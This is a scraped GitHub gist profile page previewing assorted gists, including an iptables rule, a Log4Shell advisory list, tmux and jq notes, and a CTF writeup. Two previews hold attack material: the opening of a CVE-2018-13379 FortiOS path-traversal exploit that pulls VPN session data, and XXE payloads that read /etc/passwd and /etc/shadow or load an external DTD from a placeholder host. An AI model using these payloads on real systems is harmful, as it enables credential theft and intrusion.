Skip to content

Instantly share code, notes, and snippets.

View ChOkO08's full-sized avatar

Rafael ChOkO ChOkO08

93 followers · 245 following
View GitHub Profile
@miguelmota
miguelmota / iptables.sh
Created January 7, 2022 02:39
Linux iptables block Docker container from accessing AWS metadata API (169.254.169.254)
sudo iptables --insert DOCKER-USER --destination 169.254.169.254 --jump REJECT
@SwitHak
SwitHak / 20211210-TLP-WHITE_LOG4J.md
Last active April 26, 2024 07:30
BlueTeam CheatSheet * Log4Shell* | Last updated: 2021-12-20 2238 UTC

Security Advisories / Bulletins / vendors Responses linked to Log4Shell (CVE-2021-44228)

Errors, typos, something to say ?

  • If you want to add a link, comment or send it to me
  • Feel free to report any mistake directly below in the comment or in DM on Twitter @SwitHak

Other great resources

  • Royce Williams list sorted by vendors responses Royce List
  • Very detailed list NCSC-NL
  • The list maintained by U.S. Cybersecurity and Infrastructure Security Agency: CISA List
@dwisiswant0
dwisiswant0 / st8out.sh
Last active February 17, 2024 16:48
St8out - Extra one-liner for reconnaissance
#!/bin/bash
#####
#
# St8out - Extra one-liner for reconnaissance
#
# Usage: ./st8out.sh target.com
#
# Resources:
# - https://github.com/j3ssie/metabigor
@jhaddix
jhaddix / Github bash generated search links (from hunter.sh)
Created January 12, 2020 19:55
Github bash generated search links (from hunter.sh)
@code-machina
code-machina / CVE-2018-13379.py
Last active May 29, 2023 03:33
CVE-2018-13379 : A path traversal vulnerability in the FortiOS SSL VPN web portal
import requests, binascii, optparse
from urlparse import urlparse
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
requests.packages.urllib3.disable_warnings()
import multiprocessing
def checkIP(ip):
try:
url = "https://"+ip+"/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
@worldofprasanna
worldofprasanna / terminal-capture.md
Last active April 30, 2024 20:54
Multiple screen terminal capture using asciinema & tmux

Commands Reference

  1. Start a new tmux named session tmux new -s terminal-capture
  2. Split the screen using these commands,
  • vertical split <C-b>"
  • horizontal split <C-b>%
  1. To navigate between the panes,
  • To goto Left pane <C-b> left-key
  • To goto Right pane <C-b> right-key
  • To goto Top pane up-key
@trackscorer
trackscorer / XXE and OOB
Created November 15, 2018 09:02
<?xml version=”1.0"?>
<!DOCTYPE data [
<!ELEMENT data (#ANY)>
<!ENTITY file SYSTEM “file:///etc/passwd”>]>
<data>&file;</data>
<!DOCTYPE a [ <!ENTITY % asd SYSTEM "http://x.x.x.x/xxe.dtd"> %asd; %c;]>
xxe.dtd:
@S3cur3Th1sSh1t
S3cur3Th1sSh1t / Direct XXE Windows
Last active February 29, 2024 20:25
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/shadow" >]><foo>&xxe;</foo>
@jh00nbr
jh00nbr / solver_we_also_have_memes.py
Last active February 1, 2024 04:21
Writeup - Challenge - We also have memes! - 3DS-CTF
from PIL import Image
import sys
# Team RTFM - Red Team Freakin' Maniacs - rtfm-ctf.org
# Writeup - We also have memes!- 3DS-CTF
#playing another CTFs, our team discovered an awesome algorithm to hid messages in a PNG file.
#One member of the team told that is possible to improve the algorithm to make it impossible to retrieve the original message directly. So he hiden a message on this meme and gave to us to solve.
#Prove the he's wrong!
@olih
olih / jq-cheetsheet.md
Last active May 2, 2024 00:42
jq Cheet Sheet

Processing JSON using jq

jq is useful to slice, filter, map and transform structured json data.

Installing jq

On Mac OS

brew install jq